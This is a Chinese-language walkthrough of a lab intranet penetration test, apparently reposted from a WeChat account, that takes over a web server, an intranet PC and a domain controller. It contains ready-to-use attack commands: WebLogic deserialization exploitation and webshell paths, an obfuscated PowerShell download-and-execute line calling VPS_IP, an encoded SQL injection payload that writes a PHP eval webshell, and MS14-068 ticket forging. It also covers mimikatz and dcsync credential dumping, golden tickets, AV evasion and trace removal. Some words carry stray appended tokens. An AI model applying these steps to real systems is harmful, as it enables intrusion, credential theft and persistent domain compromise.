WEB服務器:windows2008系統php
外網網卡IP:192.168.1.152
內網網卡IP:10.10.10.80
域成員:windows server 2003系統
網卡IP:10.10.10.200git
域控服務器:windows server 2008系統github
網卡IP:192.168.52.138
攻擊機器:kali windows 10web
kali IP:192.168.1.112
CobaltStrike服務器IP:192.168.1.108
Weblogic反序列化遠程代碼執行漏洞獲取webshell
這個靶機一開始在登錄web機器的時候輸入做者提示的登錄密碼不能登錄,而後我就使用administrator登錄進去把web機器的密碼修改成做者說的密碼了!進去以後須要啓動Weblogic。路徑在C:OracleMiddlewareuser_projectsdomainsbase_domain裏面。這裏面有一個批處理點擊便可。接着到攻擊機器來,使用nmap掃描目標機器,掃描到了7001端口是weblogic。shell
使用weblogic掃描工具掃描一波發現了有反序列化漏洞。windows
https://github.com/rabbitmask/WeblogicScan
這裏掃描除了兩個CVE漏洞安全
訪問一下存在漏洞的地址,接着抓包寫入poc服務器
http://192.168.1.152:7001/_async/AsyncResponseService
使用poc來驗證一下。github上面有poc微信
https://github.com/lufeirider/CVE-2019-2725
能夠看到能夠執行命令網絡
接下來的話直接讓他上線CobaltStrike。
返回200成功,可是等了好久好久都沒有CobaltStrike都沒上線,接着查看進程發現了有360安全衛士。我剛剛給的powershell應該被360攔截了
使用weblogic利用工具上傳shell上去,上傳須要找到幾個點,獲取物理路徑,以下面三種:
第一個方法是把shell寫到uddiexplorer目錄中
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\隨機字符\war\shell.jsp
目錄寫入木馬,
訪問 http://*.*.*.*:7001/uddiexplorer/shell.jsp
第二個方法是把shell寫在應用安裝目錄中
\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\項目名\隨機字符\war\shell.jsp
目錄寫入木馬,
訪問 http://*.*.*.*:7001/項目名/shell.jsp
第三個方法是把shell寫到控制檯images目錄中
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
接着在這個目錄上傳木馬
上傳成功,訪問路徑:
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
鏈接冰蠍成功!!
webshell上線Cobaltstrike
首先這裏我使用了對powershell的代碼進行混淆,首先生成powershell的payload,而後使用powershell腳本混淆工具進行混淆。地址以下:
https://github.com/danielbohannon/Invoke-Obfuscation
接着使用這個工具對powershell腳本混淆一下
接着在對powershell命令在進行混淆一次:參考師傅文章:https://xz.aliyun.com/t/7903
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://VPS_IP:port/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
以後再使用powershell命令就可讓對方上線了。
使用systeminfo能夠查看到系統的信息,當前的域是處在web域中,是一臺windows server 2008的服務器。而且打的補丁比較少
查看網絡信息,這裏是雙網卡,內網是10.10.10.0/24網段。
提權的話這裏使用了ms15-051。這裏CS有帶這個提權,嘗試一下後直接提取成功了。
直接使用mimikatz獲取到系統的密碼憑證。
因爲對方有360的話,每當執行一些敏感的命令都會有提醒阻止的。可使用使用argue參數污染,這裏把net1參數進行污染。
參數進行污染以後就可使用execute參數進行添加用戶。
查看對方開啓了3389端口以後,可使用剛剛建立的用戶進行遠程桌面登錄
使用Ladon插件對網段進行掃描,這裏能夠發現DC.delay.com多是域控。
在剛剛ipconfig獲取的域控域名進行ping測試,發現返回的IP的確就是10.10.10.10
接着使用代理進入內網探測,使用Venom代理工具進行代理。在具備具備獨立IP的機器上面執行命令:
admin.exe -lport 6666
把agent.exe上傳到對方機器上面,執行以下命令,使對方回連主機。
agent.exe -rhost 回連主機IP -rport 6666
以後在回連主機上面就能夠看到有新的鏈接已經鏈接進來了,以後進入這個節點。使用socks 1080創建一個代理的端口。
進入使用Proxifier掛上代理,端口就是剛剛設置的1080。掛上代理以後使用端口掃描工具對10.10.10.201這個IP進是端口掃描,對方開啓了80,445和3389端口。
內網PC獲取shell
訪問10.10.10.201的80端口,發現是一個BEESCMS的系統,在網上搜索了以後發現v4.0版本存在後臺的登錄框注入漏洞。
使用dirsearch對網站進行掃描,掃描發現了後臺登錄和i.php文件,i.php文件大機率就是phpinfo了吧
BESCMS後臺存在注入,直接在帳號這裏輸入單引號能夠直接報錯。
根據網上的提供的漏洞信息是能夠直接寫入一句話進去的,這裏試着訪問i.php發現真的就是phpinfo的頁面,從phpinfo泄露的信息來看這裏就是網站的根目錄了。
對這個注入進行判斷字段數,發現有五個字段,在第五字段的時候不報錯了!顯示密碼不正確!
根據網上的對BESSCMSv4.0的利用手法,寫入一句話木馬進去,在寫入一句話的時候須要對shell的payload進行編碼轉換。已經知道了根目錄,直接寫入一句話到目標的網站根目錄上面。而且須要的條件是secure_file_priv爲空才能寫入。
admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile 'C:/tongda/PHPTutorial/WWW/netstat/s.php'#
接着查看一些是否已經寫入成功,很順利這已經寫入shell成功了。並且好像這裏還出現了管理員的帳號和密碼。
以後直接使用菜刀進行鏈接便可。
接着在已經獲取的beacon中設置一箇中轉的監聽,讓內網的機器會連的時候會連到能夠出網的WEB服務器上面。
接着生成一箇中轉監聽的木馬,而且上傳到內網PC的機器上面執行。
接着這裏的代理連就已經完成了。內網的PC依靠着WEB傳遞數據出去。
既然返回回來的已是要給高權限了,那就能夠直接獲取PC裏面的憑藉密碼。
既然密碼同樣的那能夠嘗試一下是否能夠PTH獲取內網PC的主機。可是這裏顯示不能獲取。
獲取域控的權限
既然已經有了域普通用戶的的哈希,若是域控存在ms14-068漏洞的話普通用戶的權限是能夠提高爲域控權限的,首先須要有域用戶的SID值
使用命令製做一張票據出來。
MS14-068.exe -u administrator@de1ay.com -p 1qaz@WSX. -s S-1-5-21-2756371121-2868759905-3853650604-500 -d 10.10.10.10
參數說明:
- -u 域帳號+@+域名稱,這裏是WEB+@+de1ay.com
- -p 爲當前用戶的密碼,即WEB的密碼
- -s爲hello的SID值,能夠經過whoami /all來獲取用戶的SID值
- -d爲當前域的域控
執行成功以後會在當前目錄下生成一個.ccache的文件。接着清除憑證信息,在CS中能夠直接使用命令
kerberos_ticket_purge,接着將票據注入到內存當中
額這就有點!!!什麼鬼啊!
接着嘗試一下PTH直接傳遞哈希過去看看域控可否上線吧!最後仍是PTH上線了
因爲是Windows 2012的系統,並不能直接獲取到明文的密碼。能夠經過修改註冊表來獲取明文密碼
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
這裏我就不修改註冊表了,若是修改的話須要對方註銷或者重啓纔有效
接着製做黃金票據。使用命令把krbtgt的密碼HASH值獲取出來,一下兩條命令均可以獲取krbtgt密碼
lsadump::dcsync /domain:de1ay.com /user:krbtgt
LsaDump::dcsync /domain:de1ay.com /all /csv
接着使用CobaltStrike自帶的黃金票據來生成GoldenTicket
最後再把上傳的文件和webshell刪除,再把一下痕跡擦測,這裏有一位師傅的博客寫的很好https://blog.csdn.net/bylfsj/article/details/102565586
今天也是特別的日子,昨天也是哈哈哈!炎日的夏天在經歷暴雨的沖洗,換來清爽加上美麗的晚霞!
本文分享自微信公衆號 - 黑白天(li0981jing)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。